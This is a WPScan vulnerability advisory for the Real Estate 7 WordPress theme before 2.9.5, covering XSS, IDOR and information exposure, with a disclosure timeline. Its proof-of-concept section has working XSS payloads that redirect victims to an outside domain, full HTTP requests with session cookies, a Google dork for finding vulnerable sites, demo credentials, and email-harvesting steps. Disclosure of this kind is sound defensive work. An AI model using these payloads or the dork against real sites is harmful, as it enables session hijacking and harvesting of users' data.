WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Real Estate 7 < 2.9.5 - Multiple Vulnerabilities

Description

Multiple vulnerabilities was discovered in the 'Real Estate 7 WordPress', tested version — v2.9.4:

- Unauthenticated Reflected XSS
- Authenticated Persistent XSS
- Authenticated Persistent Self-XSS
- IDOR
- Information Exposure


Edit (WPScanTeam):
January 12th - Report Received & Envato Contacted
January 13th - Envato Investigating
January 13th - v2.9.5 released, fixing the issues

Proof of Concept

----[]- Info: -[]----
Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/
Google Dork: /wp-content/themes/realestate-7/
Demo account #0: m0zePoC/asdasd (login/password)
Demo account #1: agent/agent (login/password)
PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/
PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng


----[]- Persistent XSS -> Agent Profile: -[]----
Vulnerable textarea: «Agent Testimonials» (checkbox on «Show on Agents Page» is required).

Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17074317185520
Content-Length: 3843
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/
Cookie: wordpress_logged_in_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579044656%7CbronP9c4LQmxfjR6G7rde3wkkIjs5f4KLP4uS2GE6d7%7C093dd537ad0162137d9dd0c1d3ab7c3d16fc2e0179b10eef5f47d740417dc11a; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1578871869; PHPSESSID=56b216626e434857c0241dc48f07871a5a391362; __stripe_mid=9dec3f56-2a9f-484e-9e46-57c24b4ac4b8; __stripe_sid=c972e371-07ad-479a-bb0d-1e937e4f6077; dsidx-visitor-results-views=2
Upgrade-Insecure-Requests: 1

-----------------------------17074317185520
Content-Disposition: form-data; name="first_name"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="last_name"

Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="nickname"

agent
-----------------------------17074317185520
Content-Disposition: form-data; name="display_name"

Agent Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="user_url"


-----------------------------17074317185520
Content-Disposition: form-data; name="description"


-----------------------------17074317185520
Content-Disposition: form-data; name="twitterhandle"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="facebookurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="instagramurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="linkedinurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="youtubeurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="isagent"

yes
-----------------------------17074317185520
Content-Disposition: form-data; name="agentorder"


-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_profile_img"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="mobile"

6195556589
-----------------------------17074317185520
Content-Disposition: form-data; name="fax"

6195556588
-----------------------------17074317185520
Content-Disposition: form-data; name="title"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="tagline"

Selling the Dream!
-----------------------------17074317185520
Content-Disposition: form-data; name="agentlicense"

123456
-----------------------------17074317185520
Content-Disposition: form-data; name="userTestimonial"

<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_broker_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragename"


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragelicense"


-----------------------------17074317185520
Content-Disposition: form-data; name="office"

6195553698
-----------------------------17074317185520
Content-Disposition: form-data; name="address"

101 Front St, Suite 100
-----------------------------17074317185520
Content-Disposition: form-data; name="city"

San Diego
-----------------------------17074317185520
Content-Disposition: form-data; name="state"

CA
-----------------------------17074317185520
Content-Disposition: form-data; name="postalcode"

92101
-----------------------------17074317185520
Content-Disposition: form-data; name="updateuser"

Update Profile
-----------------------------17074317185520
Content-Disposition: form-data; name="_wpnonce"

b2e5069987
-----------------------------17074317185520
Content-Disposition: form-data; name="_wp_http_referer"

/wp-real-estate-7/minimal-demo/account-settings/
-----------------------------17074317185520
Content-Disposition: form-data; name="action"

update-user
-----------------------------17074317185520--


----[]- Persistent Self-XSS -> Listing Email Alerts: -[]----
It's self-XSS, but still.

Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 294
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/
Cookie: wordpress_sec_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579047619%7C8wlsFqjeItUZEZltmKiVodHvIFmXrAlHzBjBQA1hzPO%7Cd622e8a525d082f2219e03f48ec47622cc28f13b6c1bfffef939cbd75ab70756; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1578871869; wordpress_logged_in_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579047619%7C8wlsFqjeItUZEZltmKiVodHvIFmXrAlHzBjBQA1hzPO%7C8b9c07e16d6b093445f725ebb148990345f4ec8e712d60aa196cd134d92278dc; __stripe_mid=9dec3f56-2a9f-484e-9e46-57c24b4ac4b8; dsidx-visitor-results-views=11; PHPSESSID=23386885e76cc0b2eb15a06611a29dda06f8aaee; hwp_visit=1578874746788; hwp_new=true; __stripe_sid=bbfc5ced-5324-4818-b479-8c20006f2a9a

ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com


----[]- IDOR: -[]----
Parsing this URL https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX with 1-4 digits for the «p» parameter can lead you to some interesting results like this: https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/ (with package name, order date and unique login/author name as a useful information).


----[]- Information Exposure: -[]----
Each agent profile page contains the «Email» link as a pop-up form trigger. This form contains hidden input field with agent/user unique email address, for example:
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />

Same result you can achieve by watching the source code of agent profile page (it's faster if you'll search in code for «@» symbol from the bottom). 

Affects Themes

realestate-7
Fixed in version 2.9.5

References

URL
https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
URL
https://contempothemes.com/wp-real-estate-7/changelog/

Classification

Type

MULTI

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter twitter
m0ze_ru
Verified

No

WPVDB ID
5108792c-c847-4deb-999c-73065e8db74f

Timeline

Publicly Published

2020-01-14 (about 3 years ago)

Added

2020-01-14 (about 3 years ago)

Last Updated

2021-01-19 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us